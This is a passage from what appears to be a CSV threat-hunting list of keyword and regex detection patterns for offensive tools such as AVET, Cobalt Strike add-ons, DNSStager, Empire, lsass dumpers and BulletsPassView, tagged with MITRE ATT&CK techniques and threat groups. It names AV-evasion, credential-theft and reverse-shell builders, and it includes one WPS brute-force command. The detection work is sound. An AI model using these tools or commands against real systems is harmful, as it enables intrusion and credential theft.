antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_fopen_revhttps_win32.sh*",".{0,1000}build_avetenc_fopen_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_avetenc_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_avetenc_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_c_shellcode*",".{0,1000}build_c_shellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","870","139","2024-03-20T15:50:57Z","2020-02-22T15:42:37Z" "*build_c_xor_ipv6(*",".{0,1000}build_c_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" 
"*build_c_xor_ipv6_dll(*",".{0,1000}build_c_xor_ipv6_dll\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*build_calcfromcmd_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfromcmd_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_calcfrompowersh_50xshikata_revhttps_win32.sh*",".{0,1000}build_calcfrompowersh_50xshikata_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_checkdomain_rc4_mimikatz.sh*",".{0,1000}build_checkdomain_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_disablewindefpsh_xorfromcmd_revhttps_win64.sh*",".{0,1000}build_disablewindefpsh_xorfromcmd_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_dkmc_downloadexecshc_revhttps_win32.sh*",".{0,1000}build_dkmc_downloadexecshc_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadbitsadmin_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadbitsadmin_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadbitsadmin_revhttps_win32.sh*",".{0,1000}build_downloadbitsadmin_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadcertutil_revhttps_win32.sh*",".{0,1000}build_downloadcertutil_revhttps_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_downloadcurl_mtrprtrxor_revhttps_win64.sh*",".{0,1000}build_downloadcurl_mtrprtrxor_revhttps_win64\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_golang_xor_ipv6(*",".{0,1000}build_golang_xor_ipv6\(.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*build_onionpipe.bash*",".{0,1000}build_onionpipe\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*build_sleep_rc4_mimikatz.sh*",".{0,1000}build_sleep_rc4_mimikatz\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. 
which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_svc_20xshikata_bindtcp_win32.sh*",".{0,1000}build_svc_20xshikata_bindtcp_win32\.sh.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*build_tor_darwin.bash*",".{0,1000}build_tor_darwin\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" "*build_tor_debian.bash*",".{0,1000}build_tor_debian\.bash.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/cmars/onionpipe","1","1","N/A","10","5","449","29","2024-04-27T15:07:14Z","2022-01-23T06:52:13Z" 
"*BuildBOFs.exe*",".{0,1000}BuildBOFs\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*BuildBOFs.sln*",".{0,1000}BuildBOFs\.sln.{0,1000}","offensive_tool_keyword","cobaltstrike","C# .Net 5.0 project to build BOF (Beacon Object Files) in mass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ceramicskate0/BOF-Builder","1","1","N/A","10","10","24","3","2023-07-25T22:19:27Z","2021-09-07T01:28:11Z" "*builder/linpeas_parts/*",".{0,1000}builder\/linpeas_parts\/.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*Building ABPTTS configuration *",".{0,1000}Building\sABPTTS\sconfiguration\s.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","9","8","714","157","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z" "*Building Evil Lsass Twin*",".{0,1000}Building\sEvil\sLsass\sTwin.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","10","2","129","15","2024-04-19T15:15:35Z","2022-09-13T12:42:13Z" "*Building SYSTEM impersonation*",".{0,1000}Building\sSYSTEM\simpersonation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-MS16032.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*BulletsPassView.exe*",".{0,1000}BulletsPassView\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. 
you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView.zip*",".{0,1000}BulletsPassView\.zip.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_setup.exe*",".{0,1000}BulletsPassView_setup\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*BulletsPassView_x64.exe*",".{0,1000}BulletsPassView_x64\.exe.{0,1000}","offensive_tool_keyword","bulletpassview","BulletsPassView is a password recovery tool that reveals the passwords stored behind the bullets in the standard password text-box of Windows operating system and Internet Explorer Web browser. 
After revealing the passwords. you can easily copy them to the clipboard or save them into text/html/csv/xml file.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/bullets_password_view.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bully wlan1mon -b * -c 9 -S -F -B -v 3*",".{0,1000}bully\swlan1mon\s\-b\s.{0,1000}\s\-c\s9\s\-S\s\-F\s\-B\s\-v\s3.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bunny.deb.parrot.sh/*",".{0,1000}bunny\.deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. 
penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bupload_raw*.dll*",".{0,1000}bupload_raw.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","175","28","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" "*burnett_top_1024.txt*",".{0,1000}burnett_top_1024\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. 
and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Burp Suite*",".{0,1000}Burp\sSuite.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*burp*PayloadParser.py*",".{0,1000}burp.{0,1000}PayloadParser\.py.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp*SQLMapper.xml*",".{0,1000}burp.{0,1000}SQLMapper\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation 
tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*burp.extension-payloadparser*",".{0,1000}burp\.extension\-payloadparser.{0,1000}","offensive_tool_keyword","burpsuite","PayloadParser - Burp Suite NMap Parsing Interface in Python","T1583 - T1595 - T1190","TA0001 - TA0003 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/infodel/burp.extension-payloadparser","1","1","N/A","N/A","1","4","4","2013-03-15T20:41:45Z","2013-03-15T20:39:23Z" "*burp_log_*.log*",".{0,1000}burp_log_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Burp_start.bat*",".{0,1000}Burp_start\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*Burp_start_en.bat*",".{0,1000}Burp_start_en\.bat.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*burp2malleable.*",".{0,1000}burp2malleable\..{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - 
T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","10","10","339","32","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z" "*burp-co2/out/artifacts*",".{0,1000}burp\-co2\/out\/artifacts.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" "*BurpCO2Suite.xml*",".{0,1000}BurpCO2Suite\.xml.{0,1000}","offensive_tool_keyword","burpsuite","CO2 is a project for lightweight and useful enhancements to Portswigger popular Burp Suite web penetration tool through the standard Extender API","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/JGillam/burp-co2","1","1","N/A","N/A","2","150","39","2024-02-21T02:23:00Z","2015-04-19T03:38:34Z" 
